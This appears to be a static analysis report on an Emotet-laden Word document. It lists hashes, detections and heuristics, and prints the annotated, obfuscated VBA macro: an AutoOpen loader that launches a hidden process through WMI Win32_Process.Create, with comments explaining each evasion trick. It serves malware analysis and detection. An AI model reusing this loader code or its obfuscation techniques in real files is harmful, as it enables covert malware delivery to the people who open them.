Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 741a1ec554f7f6aa…

MALICIOUS

Office (OLE)

125.1 KB Created: 2019-05-22 07:01:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 630b5c45ab91553d147f1474717fa012 SHA-1: dd8752d4204e8792b9a3453e34c9980ebe09dbe2 SHA-256: 741a1ec554f7f6aa8a3f2d98391ac1cbbbcc41a2d5baee77255cd40cdb4390cf
Risk Score: 282

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-10001946-0'. Static analysis reveals obfuscated VBA macros, including an 'autoopen' subroutine and calls to GetObject, indicative of a loader. The presence of VBA macros and the Emotet family attribution strongly suggest this document is a spearphishing attachment used to download and execute a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Note: the "no modern VBA project was recovered" wording of this marker conflicts with the VBA macros detected above and the extracted macros.bas artifact; treat it as supporting evidence only.)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3861 bytes
SHA-256: 42fcb9a17dbc93776d4aeab9cba4f57d715a4c757475b5cb5545021ce1a54601
Preview script
First 1,000 lines of the extracted script
' Form module attributes for "Swlfot9", a UserForm judging by the two
' MSForms.TextBox controls declared below (bLJAPOF and FbFMIBR).
' Both controls are read by lc8cJsPt (Swlfot9.FbFMIBR, Swlfot9.bLJAPOF) when it
' assembles the command line handed to Win32_Process.Create, so part of that
' command line apparently lives in form control text rather than in the macro
' source — the "keeps indicators out of the macro source" shape the heuristics
' describe. The control values themselves are not part of this extract.
Attribute VB_Name = "Swlfot9"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "bLJAPOF, 0, 0, MSForms, TextBox"
Attribute VB_Control = "FbFMIBR, 1, 1, MSForms, TextBox"

' Start of the standard module "zC7wlka", which holds the auto-exec entry point
' (autoopen), the loader routine (lc8cJsPt) and the string wrapper (DjJziuOh).
Attribute VB_Name = "zC7wlka"
' K9hj1nG: filler procedure. Its body is only Debug.Print string concatenations,
' which produce no effect outside the VBA Immediate window, and nothing in the
' visible source calls it. The same Debug.Print padding is interleaved through
' every other procedure in this module to bulk out and disguise the real logic.
Sub K9hj1nG()
   Debug.Print "724" + ("516") + ("UPOp3Hrt" + ("23" + "361") + "vC9PPmCK" + ("rjITKvEv"))
Debug.Print "20" + ("994") + ("u_8YY68" + ("791" + "454") + "rbk4PQH" + ("iqapjj9"))
Debug.Print "942" + ("653") + ("pqQI0T2" + ("226" + "126") + "N7OT4k" + ("Z6j2ENjS"))
   Debug.Print "387" + ("127") + ("wjf7biL" + ("20" + "64") + "nE0OG8" + ("GNXHVKT"))
Debug.Print "255" + ("590") + ("kPaztnd9" + ("626" + "534") + "nc7FkKV" + ("itIImYJ"))
Debug.Print "763" + ("124") + ("lLo5VRP" + ("611" + "629") + "tJnnqa" + ("EPdjCjRp"))
End Sub
' autoopen: Word auto-execution entry point — this is the name the
' OLE_VBA_AUTOOPEN heuristic above keys on, and it runs when the document is
' opened with macros enabled. The "Sub _ / autoopen( _ / )" line-continuation
' split keeps the literal token "Sub autoopen" off any single source line, which
' defeats naive line-based signature matching. Apart from Debug.Print filler,
' the only real work here is the call to lc8cJsPt.
Sub _
autoopen( _
)
   Debug.Print "588" + ("496") + ("Bn5Mps" + ("680" + "785") + "i9QMw62V" + ("w29iIrvf"))
Debug.Print "984" + ("870") + ("ZavHKq" + ("723" + "615") + "HYijaGW" + ("MHILLpV"))
Debug.Print "58" + ("974") + ("piKRd2" + ("450" + "645") + "jwOksk" + ("OoIvNiL"))
' The loader proper.
lc8cJsPt
   Debug.Print "860" + ("836") + ("EYdLCWj" + ("544" + "391") + "w0whi5" + ("Mmcto3"))
Debug.Print "12" + ("319") + ("b1Pp9wzc" + ("397" + "829") + "Xozjnt" + ("l2HkNCop"))
Debug.Print "826" + ("309") + ("uz3s8R" + ("5" + "980") + "Z6jEJw" + ("MSGtCq"))
End Sub
' lc8cJsPt: the loader. It obtains two WMI objects through GetObject (the
' OLE_VBA_GETOBJ finding), sets a hidden-window startup record, then starts a
' process via Win32_Process.Create with a command line assembled from string
' fragments. Several of those fragments come from the Swlfot9 form controls or
' from names that are not defined anywhere in the visible source. No
' CreateObject, Shell or URL literal appears here, which is why the
' obfuscated-loader heuristic rather than a plain sink match fires.
Sub lc8cJsPt()
   Debug.Print "598" + ("292") + ("T7ADvF" + ("923" + "592") + "aoZhJ8" + ("QZ19JM"))
Debug.Print "172" + ("61") + ("siqiBj" + ("244" + "548") + "CujarQ" + ("YCQYbV9p"))
Debug.Print "481" + ("416") + ("tsilunn9" + ("628" + "880") + "bAMl1ZQ" + ("MliEdDUk"))
' WMI moniker built from mixed-case fragments, each passed through DjJziuOh.
' If DjJziuOh's wrapping strings are empty (see that function) this evaluates to
' "wInmGmts:Win32_Processstartup", i.e. a Win32_ProcessStartup instance; monikers
' are case-insensitive, so the odd casing only serves to dodge string matching.
Set vKdiFDQ0 = GetObject(DjJziuOh("wInmGmts:Wi" + DjJziuOh("n32_Processstartup")))
   Debug.Print "870" + ("607") + ("PcbfVA" + ("33" + "751") + "ulTB9X0o" + ("GJHo8HLt"))
Debug.Print "881" + ("790") + ("OlCaQq5" + ("430" + "915") + "dtB3Llk" + ("D3HJUw"))
Debug.Print "564" + ("234") + ("tf3jUt" + ("987" + "539") + "mGw4qi" + ("N_ISFuRa"))
' 456538 - 456538 = 0, so this sets Win32_ProcessStartup.ShowWindow = 0 (SW_HIDE):
' the child process is launched without a visible window. The arithmetic and the
' line-continuation split are there to disguise the constant.
vKdiFDQ0. _
ShowWindow = 456538 _
- 456538
   Debug.Print "328" + ("217") + ("fdrwbw" + ("566" + "574") + "tGl2NZc7" + ("wGc2BFvt"))
Debug.Print "869" + ("972") + ("iJBtYv" + ("737" + "700") + "uYPsi9" + ("sZdnXfA1"))
Debug.Print "734" + ("337") + ("k5O2bczf" + ("19" + "700") + "ipMDmU" + ("NAGKkCzh"))
' Second moniker, same scheme; a Win32_Process class object if the wrappers are empty.
Set TT9Nzj8 = GetObject(DjJziuOh("WinmGmts:Wi" + DjJziuOh("n32_Process")))
   Debug.Print "235" + ("742") + ("ias4NGH" + ("880" + "381") + "TibBkm" + ("AWKlSj"))
Debug.Print "846" + ("112") + ("iDDJFH" + ("967" + "689") + "pFKLwHzd" + ("adIqUP"))
Debug.Print "494" + ("835") + ("T_BjwwH" + ("223" + "397") + "tYGR6M" + ("JsYl9wG6"))
' Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation,
' ProcessId). The command line concatenates jIR3nwEm, the wrapped fragment "pOwe"
' (presumably the start of a command name, completed by the other pieces),
' zlENFnFB, the two Swlfot9 TextBox values and CfCOp_Y. jIR3nwEm, zlENFnFB,
' CfCOp_Y, k4uZjr6l and Y2kmwLH are not declared in the visible source —
' presumably module-level variables elsewhere in the project, or undeclared and
' therefore Empty. vKdiFDQ0 (the hidden-window startup record) is the third
' argument. The executed command therefore cannot be fully reconstructed from this
' extract alone; the form control text is the missing piece to pull.
TT9Nzj8.Create jIR3nwEm + DjJziuOh("pOwe") + zlENFnFB + Swlfot9.FbFMIBR + Swlfot9.bLJAPOF + CfCOp_Y, k4uZjr6l, vKdiFDQ0, Y2kmwLH
   Debug.Print "934" + ("923") + ("kKcWD2UO" + ("842" + "1") + "V1R_GfNu" + ("YOq3ut9"))
Debug.Print "551" + ("115") + ("HdZOorHc" + ("329" + "989") + "uo0d7lbt" + ("TrNqLHlR"))
Debug.Print "292" + ("885") + ("NX3wcw" + ("83" + "277") + "vjzOvQB" + ("vwOGsB0f"))
End Sub
' DjJziuOh: the string "decoder" applied to every moniker and command fragment
' in lc8cJsPt. It does nothing more than concatenate PnnQz1 + argument + WfwjhXr.
' PnnQz1 and WfwjhXr are not defined in the visible source — presumably
' module-level strings set elsewhere in the project, or undeclared and therefore
' Empty, in which case the function is an identity wrapper. Routing each fragment
' through a call keeps the assembled string out of any single literal, which is
' the evasion the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic describes.
' Parameter: cwFTwl6w — the fragment to wrap. Returns the wrapped string.
Function DjJziuOh(cwFTwl6w)
   Debug.Print "534" + ("499") + ("XbpWjXs" + ("372" + "541") + "FNrZjL2S" + ("MWYua4"))
Debug.Print "780" + ("283") + ("ZjzMaKq" + ("713" + "625") + "TnMbb1Y2" + ("KPKNERmI"))
Debug.Print "491" + ("933") + ("TZlai0Wf" + ("131" + "670") + "stLT_CY" + ("jRQn_W4"))
' The only effective statement in the function.
DjJziuOh = PnnQz1 + cwFTwl6w + WfwjhXr
   Debug.Print "883" + ("685") + ("nlufjX" + ("437" + "868") + "jpH2151" + ("wzwJ5YHv"))
Debug.Print "103" + ("92") + ("F7R7JO" + ("893" + "18") + "RBMWq4" + ("zUA83X8b"))
Debug.Print "844" + ("104") + ("RwXijt2" + ("914" + "682") + "sb5cz9ht" + ("HIKHKE5"))
End Function


Attribute VB_Name = "pkqujot"